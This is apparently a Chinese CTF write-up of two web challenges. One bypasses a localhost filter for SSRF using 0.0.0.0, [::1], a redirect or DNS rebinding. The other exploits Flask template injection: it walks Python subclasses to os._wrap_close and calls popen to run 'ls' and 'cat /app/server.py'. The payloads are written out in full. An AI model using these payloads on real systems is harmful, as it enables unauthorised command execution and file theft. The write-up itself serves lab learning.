[第三章 web进阶]Python里的SSRF
直接按照提示来:
127.0.0.1是被禁止的
用0.0.0.0代替127.0.0.1就是成功了,
127.0.0.1是本机的环回地址,0.0.0.0代表本机上任何IP地址,因此可以利用0.0.0.0来绕过127.0.0.1的过滤。
本题有多重解法
- `0.0.0.0:8000` 绕过
- `[::1]:8000` 绕过(需要支持 ipv6)
- 重定向跳转到 `127.0.0.1:8000`
- dns rebinding 输入一个域名,第一次解析到非 `127.0.0.1` 地址上,第二个解析到 `127.0.0.1` 上。
[第三章 web进阶]SSTI
尝试输入?password={
{7*7}}
可以确定就是flask模板注入
通过以下语句拿到可用的类的列表
../?password={
{
"".__class__.__bases__[0].__subclasses__()}}
我们要判断他所属的位置,这样才能进行索引,但干用眼睛看肯定太麻烦,我这有个小技巧,将全部类复制放到pycharm(与他有同样功能的工具也行),我们索引逗号的位置,我们索引到我们需要类的位置,再在索引他前面逗号的位置,我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,
我们可以先看一下我们索引的是否正确,输入url
../?password={
{
"".__class__.__bases__[0].__subclasses__()[127]}}
我这里索引的结果是127,如果不对上下浮动几位看一下,大概就这个位置,我这127是正确的,所以索引结果就是<class ‘os._wrap_close’>
构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令)
../?password={
{
"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}
整理一下就是有以下几个文件夹
├── app
├── bin
├── boot
......
└── var
其中最引起我们注意的就是app这个文件夹
经过一些尝试(目录遍历什么的),我们得知flag就在/app/server.py中,我们直接用cat查看文件内容就行
../?password={
{
"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}
